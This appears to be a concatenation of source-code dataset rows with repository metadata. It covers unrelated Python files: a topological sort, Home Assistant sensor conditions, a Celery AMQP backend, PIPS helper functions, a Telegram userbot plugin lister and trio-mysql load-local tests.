] | null | null | null | contests/atcoder/abc086/abc086_b/main.py | conao3/coder | 2cdb610fec013da88a3470d460108e8a9b462445 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
# from typing import *
# def solve(a: int, b: int) -> str:
def solve(a, b):
pass # TODO: edit here
# generated by online-judge-template-generator v4.1.0 (https://github.com/kmyk/online-judge-template-generator)
def main():
a, b = map(int, input().split())
xct = solve(a, b)
print(xct)
if __name__ == '__main__':
main()
| 22.875 | 111 | 0.631148 |
29e288d81e88dfd0ca2106db44344b055913fea5 | 1,339 | py | Python | Python/Graph_Algorithms/Maximum_Shortest_Path/topological_sort.py | belikesayantan/DSA | 61ff334e88dca4279d473c698d30ef3fe2e2f98f | [
"MIT"
] | 1 | 2021-01-08T14:47:24.000Z | 2021-01-08T14:47:24.000Z | Python/Graph_Algorithms/Maximum_Shortest_Path/topological_sort.py | belikesayantan/DSA | 61ff334e88dca4279d473c698d30ef3fe2e2f98f | [
"MIT"
] | null | null | null | Python/Graph_Algorithms/Maximum_Shortest_Path/topological_sort.py | belikesayantan/DSA | 61ff334e88dca4279d473c698d30ef3fe2e2f98f | [
"MIT"
] | null | null | null | # Topological Sort Algorithm
from Graph_Algorithms.Graph import Graph, AdjacencySetGraph
from typing import List
from queue import Queue
def topological_sort(graph: Graph) -> List[int]:
"""
:param graph: Graph Data Structure
:return: list of nodes in topological sorted order.
"""
topological_sorted_list = list()
queue = Queue()
indegree = dict()
for v in range(graph.num_vertices):
indegree[v] = graph.get_indegree(v)
for v in range(graph.num_vertices):
if indegree[v] == 0:
queue.put(v)
while not queue.empty():
vertex_visited = queue.get()
topological_sorted_list.append(vertex_visited)
for neighbour in graph.get_adjacent_vertices(vertex_visited):
indegree[neighbour] -= 1
if indegree[neighbour] == 0:
queue.put(neighbour)
if len(topological_sorted_list) != graph.num_vertices:
raise ValueError("Graph contains a cycle !!")
return topological_sorted_list
if __name__ == '__main__':
g = AdjacencySetGraph(9, isdirected=True)
g.add_edge(0, 1)
g.add_edge(1, 2)
g.add_edge(2, 7)
g.add_edge(2, 4)
g.add_edge(2, 3)
g.add_edge(1, 5)
g.add_edge(5, 6)
g.add_edge(3, 6)
g.add_edge(3, 4)
g.add_edge(6, 8)
print(topological_sort(g))
| 25.264151 | 69 | 0.640777 |
eed5c3f5896564824a860e70dd327e8d9459e731 | 8,218 | py | Python | homeassistant/components/binary_sensor/device_condition.py | RavensburgOP/core | 0ea76e848b182ca0ebb0fdb54558f7f733898ad7 | [
"Apache-2.0"
] | 11 | 2018-02-16T15:35:47.000Z | 2020-01-14T15:20:00.000Z | homeassistant/components/binary_sensor/device_condition.py | RavensburgOP/core | 0ea76e848b182ca0ebb0fdb54558f7f733898ad7 | [
"Apache-2.0"
] | 77 | 2020-07-16T16:43:09.000Z | 2022-03-31T06:14:37.000Z | homeassistant/components/binary_sensor/device_condition.py | Vaarlion/core | f3de8b9f28de01abf72c0f5bb0b457eb1841f201 | [
"Apache-2.0"
] | 6 | 2018-02-04T03:48:55.000Z | 2022-01-24T20:37:04.000Z | """Implement device conditions for binary sensor."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.device_automation.const import CONF_IS_OFF, CONF_IS_ON
from homeassistant.const import CONF_ENTITY_ID, CONF_FOR, CONF_TYPE
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers import condition, config_validation as cv
from homeassistant.helpers.entity import get_device_class
from homeassistant.helpers.entity_registry import (
async_entries_for_device,
async_get_registry,
)
from homeassistant.helpers.typing import ConfigType
from . import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_BATTERY_CHARGING,
DEVICE_CLASS_COLD,
DEVICE_CLASS_CONNECTIVITY,
DEVICE_CLASS_DOOR,
DEVICE_CLASS_GARAGE_DOOR,
DEVICE_CLASS_GAS,
DEVICE_CLASS_HEAT,
DEVICE_CLASS_LIGHT,
DEVICE_CLASS_LOCK,
DEVICE_CLASS_MOISTURE,
DEVICE_CLASS_MOTION,
DEVICE_CLASS_MOVING,
DEVICE_CLASS_OCCUPANCY,
DEVICE_CLASS_OPENING,
DEVICE_CLASS_PLUG,
DEVICE_CLASS_POWER,
DEVICE_CLASS_PRESENCE,
DEVICE_CLASS_PROBLEM,
DEVICE_CLASS_SAFETY,
DEVICE_CLASS_SMOKE,
DEVICE_CLASS_SOUND,
DEVICE_CLASS_VIBRATION,
DEVICE_CLASS_WINDOW,
DOMAIN,
)
DEVICE_CLASS_NONE = "none"
CONF_IS_BAT_LOW = "is_bat_low"
CONF_IS_NOT_BAT_LOW = "is_not_bat_low"
CONF_IS_CHARGING = "is_charging"
CONF_IS_NOT_CHARGING = "is_not_charging"
CONF_IS_COLD = "is_cold"
CONF_IS_NOT_COLD = "is_not_cold"
CONF_IS_CONNECTED = "is_connected"
CONF_IS_NOT_CONNECTED = "is_not_connected"
CONF_IS_GAS = "is_gas"
CONF_IS_NO_GAS = "is_no_gas"
CONF_IS_HOT = "is_hot"
CONF_IS_NOT_HOT = "is_not_hot"
CONF_IS_LIGHT = "is_light"
CONF_IS_NO_LIGHT = "is_no_light"
CONF_IS_LOCKED = "is_locked"
CONF_IS_NOT_LOCKED = "is_not_locked"
CONF_IS_MOIST = "is_moist"
CONF_IS_NOT_MOIST = "is_not_moist"
CONF_IS_MOTION = "is_motion"
CONF_IS_NO_MOTION = "is_no_motion"
CONF_IS_MOVING = "is_moving"
CONF_IS_NOT_MOVING = "is_not_moving"
CONF_IS_OCCUPIED = "is_occupied"
CONF_IS_NOT_OCCUPIED = "is_not_occupied"
CONF_IS_PLUGGED_IN = "is_plugged_in"
CONF_IS_NOT_PLUGGED_IN = "is_not_plugged_in"
CONF_IS_POWERED = "is_powered"
CONF_IS_NOT_POWERED = "is_not_powered"
CONF_IS_PRESENT = "is_present"
CONF_IS_NOT_PRESENT = "is_not_present"
CONF_IS_PROBLEM = "is_problem"
CONF_IS_NO_PROBLEM = "is_no_problem"
CONF_IS_UNSAFE = "is_unsafe"
CONF_IS_NOT_UNSAFE = "is_not_unsafe"
CONF_IS_SMOKE = "is_smoke"
CONF_IS_NO_SMOKE = "is_no_smoke"
CONF_IS_SOUND = "is_sound"
CONF_IS_NO_SOUND = "is_no_sound"
CONF_IS_VIBRATION = "is_vibration"
CONF_IS_NO_VIBRATION = "is_no_vibration"
CONF_IS_OPEN = "is_open"
CONF_IS_NOT_OPEN = "is_not_open"
IS_ON = [
CONF_IS_BAT_LOW,
CONF_IS_CHARGING,
CONF_IS_COLD,
CONF_IS_CONNECTED,
CONF_IS_GAS,
CONF_IS_HOT,
CONF_IS_LIGHT,
CONF_IS_NOT_LOCKED,
CONF_IS_MOIST,
CONF_IS_MOTION,
CONF_IS_MOVING,
CONF_IS_OCCUPIED,
CONF_IS_OPEN,
CONF_IS_PLUGGED_IN,
CONF_IS_POWERED,
CONF_IS_PRESENT,
CONF_IS_PROBLEM,
CONF_IS_SMOKE,
CONF_IS_SOUND,
CONF_IS_UNSAFE,
CONF_IS_VIBRATION,
CONF_IS_ON,
]
IS_OFF = [
CONF_IS_NOT_BAT_LOW,
CONF_IS_NOT_CHARGING,
CONF_IS_NOT_COLD,
CONF_IS_NOT_CONNECTED,
CONF_IS_NOT_HOT,
CONF_IS_LOCKED,
CONF_IS_NOT_MOIST,
CONF_IS_NOT_MOVING,
CONF_IS_NOT_OCCUPIED,
CONF_IS_NOT_OPEN,
CONF_IS_NOT_PLUGGED_IN,
CONF_IS_NOT_POWERED,
CONF_IS_NOT_PRESENT,
CONF_IS_NOT_UNSAFE,
CONF_IS_NO_GAS,
CONF_IS_NO_LIGHT,
CONF_IS_NO_MOTION,
CONF_IS_NO_PROBLEM,
CONF_IS_NO_SMOKE,
CONF_IS_NO_SOUND,
CONF_IS_NO_VIBRATION,
CONF_IS_OFF,
]
ENTITY_CONDITIONS = {
DEVICE_CLASS_BATTERY: [
{CONF_TYPE: CONF_IS_BAT_LOW},
{CONF_TYPE: CONF_IS_NOT_BAT_LOW},
],
DEVICE_CLASS_BATTERY_CHARGING: [
{CONF_TYPE: CONF_IS_CHARGING},
{CONF_TYPE: CONF_IS_NOT_CHARGING},
],
DEVICE_CLASS_COLD: [{CONF_TYPE: CONF_IS_COLD}, {CONF_TYPE: CONF_IS_NOT_COLD}],
DEVICE_CLASS_CONNECTIVITY: [
{CONF_TYPE: CONF_IS_CONNECTED},
{CONF_TYPE: CONF_IS_NOT_CONNECTED},
],
DEVICE_CLASS_DOOR: [{CONF_TYPE: CONF_IS_OPEN}, {CONF_TYPE: CONF_IS_NOT_OPEN}],
DEVICE_CLASS_GARAGE_DOOR: [
{CONF_TYPE: CONF_IS_OPEN},
{CONF_TYPE: CONF_IS_NOT_OPEN},
],
DEVICE_CLASS_GAS: [{CONF_TYPE: CONF_IS_GAS}, {CONF_TYPE: CONF_IS_NO_GAS}],
DEVICE_CLASS_HEAT: [{CONF_TYPE: CONF_IS_HOT}, {CONF_TYPE: CONF_IS_NOT_HOT}],
DEVICE_CLASS_LIGHT: [{CONF_TYPE: CONF_IS_LIGHT}, {CONF_TYPE: CONF_IS_NO_LIGHT}],
DEVICE_CLASS_LOCK: [{CONF_TYPE: CONF_IS_LOCKED}, {CONF_TYPE: CONF_IS_NOT_LOCKED}],
DEVICE_CLASS_MOISTURE: [{CONF_TYPE: CONF_IS_MOIST}, {CONF_TYPE: CONF_IS_NOT_MOIST}],
DEVICE_CLASS_MOTION: [{CONF_TYPE: CONF_IS_MOTION}, {CONF_TYPE: CONF_IS_NO_MOTION}],
DEVICE_CLASS_MOVING: [{CONF_TYPE: CONF_IS_MOVING}, {CONF_TYPE: CONF_IS_NOT_MOVING}],
DEVICE_CLASS_OCCUPANCY: [
{CONF_TYPE: CONF_IS_OCCUPIED},
{CONF_TYPE: CONF_IS_NOT_OCCUPIED},
],
DEVICE_CLASS_OPENING: [{CONF_TYPE: CONF_IS_OPEN}, {CONF_TYPE: CONF_IS_NOT_OPEN}],
DEVICE_CLASS_PLUG: [
{CONF_TYPE: CONF_IS_PLUGGED_IN},
{CONF_TYPE: CONF_IS_NOT_PLUGGED_IN},
],
DEVICE_CLASS_POWER: [
{CONF_TYPE: CONF_IS_POWERED},
{CONF_TYPE: CONF_IS_NOT_POWERED},
],
DEVICE_CLASS_PRESENCE: [
{CONF_TYPE: CONF_IS_PRESENT},
{CONF_TYPE: CONF_IS_NOT_PRESENT},
],
DEVICE_CLASS_PROBLEM: [
{CONF_TYPE: CONF_IS_PROBLEM},
{CONF_TYPE: CONF_IS_NO_PROBLEM},
],
DEVICE_CLASS_SAFETY: [{CONF_TYPE: CONF_IS_UNSAFE}, {CONF_TYPE: CONF_IS_NOT_UNSAFE}],
DEVICE_CLASS_SMOKE: [{CONF_TYPE: CONF_IS_SMOKE}, {CONF_TYPE: CONF_IS_NO_SMOKE}],
DEVICE_CLASS_SOUND: [{CONF_TYPE: CONF_IS_SOUND}, {CONF_TYPE: CONF_IS_NO_SOUND}],
DEVICE_CLASS_VIBRATION: [
{CONF_TYPE: CONF_IS_VIBRATION},
{CONF_TYPE: CONF_IS_NO_VIBRATION},
],
DEVICE_CLASS_WINDOW: [{CONF_TYPE: CONF_IS_OPEN}, {CONF_TYPE: CONF_IS_NOT_OPEN}],
DEVICE_CLASS_NONE: [{CONF_TYPE: CONF_IS_ON}, {CONF_TYPE: CONF_IS_OFF}],
}
CONDITION_SCHEMA = cv.DEVICE_CONDITION_BASE_SCHEMA.extend(
{
vol.Required(CONF_ENTITY_ID): cv.entity_id,
vol.Required(CONF_TYPE): vol.In(IS_OFF + IS_ON),
vol.Optional(CONF_FOR): cv.positive_time_period_dict,
}
)
async def async_get_conditions(
hass: HomeAssistant, device_id: str
) -> list[dict[str, str]]:
"""List device conditions."""
conditions: list[dict[str, str]] = []
entity_registry = await async_get_registry(hass)
entries = [
entry
for entry in async_entries_for_device(entity_registry, device_id)
if entry.domain == DOMAIN
]
for entry in entries:
device_class = get_device_class(hass, entry.entity_id) or DEVICE_CLASS_NONE
templates = ENTITY_CONDITIONS.get(
device_class, ENTITY_CONDITIONS[DEVICE_CLASS_NONE]
)
conditions.extend(
{
**template,
"condition": "device",
"device_id": device_id,
"entity_id": entry.entity_id,
"domain": DOMAIN,
}
for template in templates
)
return conditions
@callback
def async_condition_from_config(
config: ConfigType, config_validation: bool
) -> condition.ConditionCheckerType:
"""Evaluate state based on configuration."""
if config_validation:
config = CONDITION_SCHEMA(config)
condition_type = config[CONF_TYPE]
if condition_type in IS_ON:
stat = "on"
else:
stat = "off"
state_config = {
condition.CONF_CONDITION: "state",
condition.CONF_ENTITY_ID: config[CONF_ENTITY_ID],
condition.CONF_STATE: stat,
}
if CONF_FOR in config:
state_config[CONF_FOR] = config[CONF_FOR]
return condition.state_from_config(state_config)
async def async_get_condition_capabilities(hass: HomeAssistant, config: dict) -> dict:
"""List condition capabilities."""
return {
"extra_fields": vol.Schema(
{vol.Optional(CONF_FOR): cv.positive_time_period_dict}
)
}
| 30.437037 | 88 | 0.721952 |
5b13b5f95b382d50806855ba8bf46c5793876164 | 9,697 | py | Python | vendor-local/lib/python/celery/backends/amqp.py | Mozilla-GitHub-Standards/54c69db06ef83bda60e995a6c34ecfd168ca028994e40ce817295415bb409f0c | f80e7c0cff97a1e9b301aa04015db983c7645778 | [
"BSD-3-Clause"
] | 4 | 2015-05-08T16:58:53.000Z | 2019-09-06T05:30:59.000Z | vendor-local/lib/python/celery/backends/amqp.py | Mozilla-GitHub-Standards/54c69db06ef83bda60e995a6c34ecfd168ca028994e40ce817295415bb409f0c | f80e7c0cff97a1e9b301aa04015db983c7645778 | [
"BSD-3-Clause"
] | 2 | 2019-02-17T17:44:53.000Z | 2019-03-28T03:54:39.000Z | vendor-local/lib/python/celery/backends/amqp.py | Mozilla-GitHub-Standards/54c69db06ef83bda60e995a6c34ecfd168ca028994e40ce817295415bb409f0c | f80e7c0cff97a1e9b301aa04015db983c7645778 | [
"BSD-3-Clause"
] | 7 | 2015-05-21T15:38:29.000Z | 2019-10-28T23:39:06.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import with_statement
import socket
import threading
import time
from itertools import count
from kombu.entity import Exchange, Queue
from kombu.messaging import Consumer, Producer
from .. import states
from ..exceptions import TimeoutError
from .base import BaseDictBackend
class BacklogLimitExceeded(Exception):
"""Too much state history to fast-forward."""
def repair_uuid(s):
# Historically the dashes in UUIDS are removed from AMQ entity names,
# but there is no known reason to. Hopefully we'll be able to fix
# this in v3.0.
return "%s-%s-%s-%s-%s" % (s[:8], s[8:12], s[12:16], s[16:20], s[20:])
class AMQPBackend(BaseDictBackend):
"""Publishes results by sending messages."""
Exchange = Exchange
Queue = Queue
Consumer = Consumer
Producer = Producer
BacklogLimitExceeded = BacklogLimitExceeded
supports_native_join = True
def __init__(self, connection=None, exchange=None, exchange_type=None,
persistent=None, serializer=None, auto_delete=True,
**kwargs):
super(AMQPBackend, self).__init__(**kwargs)
conf = self.app.conf
self._connection = connection
self.queue_arguments = {}
self.persistent = (conf.CELERY_RESULT_PERSISTENT if persistent is None
else persistent)
delivery_mode = persistent and "persistent" or "transient"
exchange = exchange or conf.CELERY_RESULT_EXCHANGE
exchange_type = exchange_type or conf.CELERY_RESULT_EXCHANGE_TYPE
self.exchange = self.Exchange(name=exchange,
type=exchange_type,
delivery_mode=delivery_mode,
durable=self.persistent,
auto_delete=False)
self.serializer = serializer or conf.CELERY_RESULT_SERIALIZER
self.auto_delete = auto_delete
# AMQP_TASK_RESULT_EXPIRES setting is deprecated and will be
# removed in version 3.0.
dexpires = conf.CELERY_AMQP_TASK_RESULT_EXPIRES
self.expires = None
if "expires" in kwargs:
if kwargs["expires"] is not None:
self.expires = self.prepare_expires(kwargs["expires"])
else:
self.expires = self.prepare_expires(dexpires)
if self.expires:
self.queue_arguments["x-expires"] = int(self.expires * 1000)
self.mutex = threading.Lock()
def _create_binding(self, task_id):
name = task_id.replace("-", "")
return self.Queue(name=name,
exchange=self.exchange,
routing_key=name,
durable=self.persistent,
auto_delete=self.auto_delete,
queue_arguments=self.queue_arguments)
def _create_producer(self, task_id, connection):
self._create_binding(task_id)(connection.default_channel).declare()
return self.Producer(connection, exchange=self.exchange,
routing_key=task_id.replace("-", ""),
serializer=self.serializer)
def _create_consumer(self, bindings, channel):
return self.Consumer(channel, bindings, no_ack=True)
def _publish_result(self, connection, task_id, meta):
# cache single channel
self._create_producer(task_id, connection).publish(meta)
def revive(self, channel):
pass
def _store_result(self, task_id, result, status, traceback=None,
max_retries=20, interval_start=0, interval_step=1,
interval_max=1):
"""Send task return value and status."""
with self.mutex:
with self.app.pool.acquire(block=True) as conn:
def errback(error, delay):
print("Couldn't send result for %r: %r. Retry in %rs." % (
task_id, error, delay))
send = conn.ensure(self, self._publish_result,
max_retries=max_retries,
errback=errback,
interval_start=interval_start,
interval_step=interval_step,
interval_max=interval_max)
send(conn, task_id, {"task_id": task_id, "status": status,
"result": self.encode_result(result, status),
"traceback": traceback})
return result
def get_task_meta(self, task_id, cache=True):
return self.poll(task_id)
def wait_for(self, task_id, timeout=None, cache=True, propagate=True,
**kwargs):
cached_meta = self._cache.get(task_id)
if cache and cached_meta and \
cached_meta["status"] in states.READY_STATES:
meta = cached_meta
else:
try:
meta = self.consume(task_id, timeout=timeout)
except socket.timeout:
raise TimeoutError("The operation timed out.")
state = meta["status"]
if state == states.SUCCESS:
return meta["result"]
elif state in states.PROPAGATE_STATES:
if propagate:
raise self.exception_to_python(meta["result"])
return meta["result"]
else:
return self.wait_for(task_id, timeout, cache)
def poll(self, task_id, backlog_limit=100):
with self.app.pool.acquire_channel(block=True) as (_, channel):
binding = self._create_binding(task_id)(channel)
binding.declare()
latest, acc = None, None
for i in count(): # fast-forward
latest, acc = acc, binding.get(no_ack=True)
if not acc:
break
if i > backlog_limit:
raise self.BacklogLimitExceeded(task_id)
if latest:
payload = self._cache[task_id] = latest.payload
return payload
elif task_id in self._cache: # use previously received state.
return self._cache[task_id]
return {"status": states.PENDING, "result": None}
def drain_events(self, connection, consumer, timeout=None, now=time.time):
wait = connection.drain_events
results = {}
def callback(meta, message):
if meta["status"] in states.READY_STATES:
uuid = repair_uuid(message.delivery_info["routing_key"])
results[uuid] = meta
consumer.callbacks[:] = [callback]
time_start = now()
while 1:
# Total time spent may exceed a single call to wait()
if timeout and now() - time_start >= timeout:
raise socket.timeout()
wait(timeout=timeout)
if results: # got event on the wanted channel.
break
self._cache.update(results)
return results
def consume(self, task_id, timeout=None):
with self.app.pool.acquire_channel(block=True) as (conn, channel):
binding = self._create_binding(task_id)
with self._create_consumer(binding, channel) as consumer:
return self.drain_events(conn, consumer, timeout).values()[0]
def get_many(self, task_ids, timeout=None, **kwargs):
with self.app.pool.acquire_channel(block=True) as (conn, channel):
ids = set(task_ids)
cached_ids = set()
for task_id in ids:
try:
cached = self._cache[task_id]
except KeyError:
pass
else:
if cached["status"] in states.READY_STATES:
yield task_id, cached
cached_ids.add(task_id)
ids ^= cached_ids
bindings = [self._create_binding(task_id) for task_id in task_ids]
with self._create_consumer(bindings, channel) as consumer:
while ids:
r = self.drain_events(conn, consumer, timeout)
ids ^= set(r)
for ready_id, ready_meta in r.iteritems():
yield ready_id, ready_meta
def reload_task_result(self, task_id):
raise NotImplementedError(
"reload_task_result is not supported by this backend.")
def reload_taskset_result(self, task_id):
"""Reload taskset result, even if it has been previously fetched."""
raise NotImplementedError(
"reload_taskset_result is not supported by this backend.")
def save_taskset(self, taskset_id, result):
raise NotImplementedError(
"save_taskset is not supported by this backend.")
def restore_taskset(self, taskset_id, cache=True):
raise NotImplementedError(
"restore_taskset is not supported by this backend.")
def delete_taskset(self, taskset_id):
raise NotImplementedError(
"delete_taskset is not supported by this backend.")
def __reduce__(self, args=(), kwargs={}):
kwargs.update(
dict(connection=self._connection,
exchange=self.exchange.name,
exchange_type=self.exchange.type,
persistent=self.persistent,
serializer=self.serializer,
auto_delete=self.auto_delete,
expires=self.expires))
return super(AMQPBackend, self).__reduce__(args, kwargs)
| 38.943775 | 78 | 0.583892 |
64c2f9e7dcfa819a142cbc7aa01a03320823ce1e | 160 | py | Python | demos/__init__.py | droidadroit/nasbot | f8d5d0ba8b77c37ebaa6cd2ab148a2633ff20207 | [
"MIT"
] | null | null | null | demos/__init__.py | droidadroit/nasbot | f8d5d0ba8b77c37ebaa6cd2ab148a2633ff20207 | [
"MIT"
] | null | null | null | demos/__init__.py | droidadroit/nasbot | f8d5d0ba8b77c37ebaa6cd2ab148a2633ff20207 | [
"MIT"
] | null | null | null | """
Library for Bayesian Optimisation of NN Architectures.
Some demos for architecture search on synthetic and real problems.
-- kandasamy@cs.cmu.edu
""" | 32 | 68 | 0.75 |
921363bbf833f47c167f4dc774346b19052d3b4a | 3,627 | py | Python | packages/PIPS/pips/src/Passes/pyps/pypsex.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 51 | 2015-01-31T01:51:39.000Z | 2022-02-18T02:01:50.000Z | packages/PIPS/pips/src/Passes/pyps/pypsex.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 7 | 2017-05-29T09:29:00.000Z | 2019-03-11T16:01:39.000Z | packages/PIPS/pips/src/Passes/pyps/pypsex.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 12 | 2015-03-26T08:05:38.000Z | 2022-02-18T02:01:51.000Z | # -*- coding: utf-8 -*-
"""
Transformation - specific methods must be placed there.
For instance to enforce a property value, an activate etc before calling a pass
"""
from subprocess import Popen, PIPE
import pyps
import sys, os
def dump_chains_or_dg(module,which="whole_dependence"):
"""dump textual module's dependence graph or atomic chains, "which" parameter
specify which "flavor" you want, for instance "chains" or "effective_dependence"
(default is whole_dependence)"""
generator_name = "print_"+which+"_graph"
generator = getattr(module,generator_name)
if generator == None:
return "Sorry, " + generator_name + " is undefined !"
generator()
filename = os.path.join(module.workspace.dirname,module.show("DG_FILE"))
read_data = "An error occured"
with open(filename, 'r') as f:
read_data = f.read()
print "// " + which + " for " + module.name
print read_data
pyps.module.dump_chains_or_dg=dump_chains_or_dg
def dump_chains_or_dg(self, which="whole_dependence"):
""" """
for m in self:
m.dump_chains_or_dg(which=which)
pyps.modules.dump_chains_or_dg=dump_chains_or_dg
def view_chains_or_dg(module,format="png"):
"""view module's dependence graph or atomic chains in the format specified
by ``format'' , not intended to be called direcly, use view_dg or view_chains"""
of=module.name+"."+format
dot_cmd = ["dot","-T"+format, os.path.join(module.workspace.dirname,module.show("DOTDG_FILE")),"-o"+of]
if module.workspace.verbose:
print >> sys.stderr , "Generating image with", dot_cmd
p = Popen(dot_cmd, stdout = PIPE, stderr = PIPE)
(out,err) = p.communicate()
if p.returncode !=0:
print >> sys.stderr, err
raise RuntimeError("%s failed with return code %d" % (dot_cmd, ret))
return (of,out,err)
pyps.module.view_chains_or_dg=view_chains_or_dg
def view_dg(module,format="png"):
"""view module's dependence graph in the format specified by ``format''"""
module.print_dot_dependence_graph()
return module.view_chains_or_dg(format=format)
pyps.module.view_dg=view_dg
def view_chains(module,format="png"):
"""view module's dependence graph in the format specified by ``format''"""
module.print_dot_chains_graph()
return module.view_chains_or_dg(format=format)
pyps.module.view_chains=view_chains
def loop_distribution(module,**kwargs):
module.rice_all_dependence(**kwargs)
module.internalize_parallel_code(**kwargs)
pyps.module.loop_distribution=loop_distribution
def improve_locality(module,**kwargs):
module.nest_parallelization(**kwargs)
module.internalize_parallel_code(**kwargs)
pyps.module.improve_locality=improve_locality
_simdizer_auto_tile=pyps.loop.simdizer_auto_tile
def simdizer_auto_tile(loop,**kwargs):
loop.module.split_update_operator(**kwargs)
_simdizer_auto_tile(loop,**kwargs)
pyps.loop.simdizer_auto_tile=simdizer_auto_tile
_simdizer=pyps.module.simdizer
def simdizer(module,**kwargs):
module._ws.activate(module.must_regions)
module._ws.activate(module.region_chains)
module._ws.activate(module.rice_regions_dependence_graph)
_simdizer(module,**kwargs)
pyps.module.simdizer=simdizer
# Unfolding, pyps way ! :-)
def unfold(module,**kwargs):
while module.callees:
# We continue to inline every callees while there's at least one
# inlining done. We avoid inlining stubs
one_inlining_done = 0
for callee in module.callees:
if not callee.stub_p:
callee.inlining(callers=module.name)
one_inlining_done+=1
if one_inlining_done == 0:
break;
pyps.module.unfold = unfold
def unfold(modules,**kwargs):
for m in modules:
m.unfold()
pyps.modules.unfold = unfold
| 34.216981 | 104 | 0.75131 |
d82f075cc5c3ab6d09796da196792d7c8fcce0ed | 500 | py | Python | tracking/__init__.py | mjschultz/django-tracking2 | 19679bd16b94e1cc4c9d5bd1abcc01e55dcac49c | [
"BSD-2-Clause"
] | null | null | null | tracking/__init__.py | mjschultz/django-tracking2 | 19679bd16b94e1cc4c9d5bd1abcc01e55dcac49c | [
"BSD-2-Clause"
] | null | null | null | tracking/__init__.py | mjschultz/django-tracking2 | 19679bd16b94e1cc4c9d5bd1abcc01e55dcac49c | [
"BSD-2-Clause"
] | null | null | null | __version_info__ = {
'major': 0,
'minor': 2,
'micro': 2,
'releaselevel': 'beta',
'serial': 1
}
def get_version(short=False):
assert __version_info__['releaselevel'] in ('alpha', 'beta', 'final')
vers = ["%(major)i.%(minor)i.%(micro)i" % __version_info__]
if __version_info__['releaselevel'] != 'final' and not short:
vers.append('%s%i' % (__version_info__['releaselevel'][0], __version_info__['serial']))
return ''.join(vers)
__version__ = get_version()
| 29.411765 | 95 | 0.628 |
3042e205e0ae2ab6624b2ab539924832d8290dff | 1,268 | py | Python | userbot/plugins/command_list.py | staxx1/TurhanUser | 555e7e7a781104981b92e33bb9ad583b062bc14d | [
"MIT"
] | 5 | 2020-08-17T08:05:53.000Z | 2020-09-11T18:27:41.000Z | userbot/plugins/command_list.py | staxx1/TurhanUser | 555e7e7a781104981b92e33bb9ad583b062bc14d | [
"MIT"
] | null | null | null | userbot/plugins/command_list.py | staxx1/TurhanUser | 555e7e7a781104981b92e33bb9ad583b062bc14d | [
"MIT"
] | null | null | null | # Join @TeleBotHelp for custom plugins
import asyncio
import requests
from telebot import CMD_HELP
@telebot.on(admin_cmd(pattern="cmds", outgoing=True))
@telebot.on(sudo_cmd(pattern="cmds", allow_sudo=True))
async def install(event):
if event.fwd_from:
return
tele = await eor(event, "`Searching for all plugins...`")
cmd = "ls telebot/plugins"
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
o = stdout.decode()
_o = o.split("\n")
o = "\n".join(_o)
OUTPUT = (
OUTPUT
) = f"Here is the list of plugins found in 'master' branch of TeleBot.\n{o}\n\nUse .help <cmd_name> to learn how a paticular plugin works.\nConsider joining @Turhanuserbott for help!"
await tele.edit("`Plugins extracted, pasting it...`")
message = OUTPUT
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r['key']}"
await tele.edit(
f"`All plugins available in` **TeleBot** `can be found` [here]({url})!!"
)
CMD_HELP.update(
{"command_list": ".cmds\nUse - Get the list of all plugins in the bot."}
)
| 31.7 | 187 | 0.659306 |
a07ccc3bff18963555bcbce7a4ce890c41c33d7e | 3,898 | py | Python | tests/test_load_local.py | mhumpula/trio-mysql | a892bf128056cae7668437842aece74d9a0eb8dd | [
"MIT"
] | null | null | null | tests/test_load_local.py | mhumpula/trio-mysql | a892bf128056cae7668437842aece74d9a0eb8dd | [
"MIT"
] | null | null | null | tests/test_load_local.py | mhumpula/trio-mysql | a892bf128056cae7668437842aece74d9a0eb8dd | [
"MIT"
] | null | null | null | import pytest
from trio_mysql import cursors, OperationalError, Warning
from tests import base
import os
import warnings
__all__ = ["TestLoadLocal"]
class TestLoadLocal(base.TrioMySQLTestCase):
@pytest.mark.trio
async def test_no_file(self, set_me_up):
await set_me_up(self)
"""Test load local infile when the file does not exist"""
conn = await self.connect()
c = conn.cursor()
await c.execute("CREATE TABLE test_load_local (a INTEGER, b INTEGER)")
try:
with self.assertRaises(OperationalError):
await c.execute ("LOAD DATA LOCAL INFILE 'no_data.txt' INTO TABLE "
"test_load_local fields terminated by ','")
finally:
await c.execute("DROP TABLE test_load_local")
await c.aclose()
@pytest.mark.trio
async def test_load_file(self, set_me_up):
await set_me_up(self)
"""Test load local infile with a valid file"""
conn = await self.connect()
c = conn.cursor()
await c.execute("CREATE TABLE test_load_local (a INTEGER, b INTEGER)")
filename = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'data',
'load_local_data.txt')
try:
await c.execute(
("LOAD DATA LOCAL INFILE '{0}' INTO TABLE " +
"test_load_local FIELDS TERMINATED BY ','").format(filename)
)
await c.execute("SELECT COUNT(*) FROM test_load_local")
self.assertEqual(22749, (await c.fetchone())[0])
finally:
await c.execute("DROP TABLE test_load_local")
@pytest.mark.trio
async def test_unbuffered_load_file(self, set_me_up):
await set_me_up(self)
"""Test unbuffered load local infile with a valid file"""
conn = await self.connect()
c = conn.cursor(cursors.SSCursor)
await c.execute("CREATE TABLE test_load_local (a INTEGER, b INTEGER)")
filename = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'data',
'load_local_data.txt')
try:
await c.execute(
("LOAD DATA LOCAL INFILE '{0}' INTO TABLE " +
"test_load_local FIELDS TERMINATED BY ','").format(filename)
)
await c.execute("SELECT COUNT(*) FROM test_load_local")
self.assertEqual(22749, (await c.fetchone())[0])
finally:
await c.aclose()
await conn.aclose()
await conn.connect()
c = conn.cursor()
await c.execute("DROP TABLE test_load_local")
@pytest.mark.trio
async def test_load_warnings(self, set_me_up):
await set_me_up(self)
"""Test load local infile produces the appropriate warnings"""
conn = await self.connect()
